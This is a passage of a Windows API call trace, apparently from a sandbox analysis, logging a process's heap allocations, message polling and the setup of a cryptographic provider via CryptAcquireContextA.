hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0148.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0148.467] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0148.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0148.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0148.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0148.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0148.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0148.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0148.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0148.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0148.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0148.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0148.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0148.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0148.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0148.468] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0148.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0148.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0148.468] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0148.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0148.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0148.468] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0148.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0148.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0148.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.469] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0148.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0148.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0148.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0148.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0148.471] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0148.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0148.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0148.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0148.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e699a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0148.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0148.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0148.471] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0148.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0148.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0148.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0148.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0148.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0148.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0148.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0148.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0148.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0148.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0148.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0148.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0148.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0148.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0148.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0148.472] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0148.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0148.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0148.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0148.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0148.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0148.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0148.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0148.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0148.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0148.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0148.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0148.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0148.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0148.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0148.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0148.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0148.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0148.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0148.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0148.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0148.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0148.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0148.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0148.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0148.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0148.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0148.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0148.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0148.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0148.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0148.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0148.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0148.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0148.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0148.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0148.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0148.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0148.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0148.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0148.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0148.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0148.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0148.484] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0148.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0148.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0148.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0148.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0148.484] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0148.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0148.484] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0148.485] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0148.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0148.485] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0148.485] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.485] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.485] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0148.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0148.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0148.641] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0148.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0148.641] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0148.641] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0148.641] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0148.641] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0148.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0148.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0148.641] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0148.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0148.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0148.641] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0148.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0148.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0148.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0148.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0148.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0148.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0148.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0148.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0148.644] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0148.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0148.644] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: 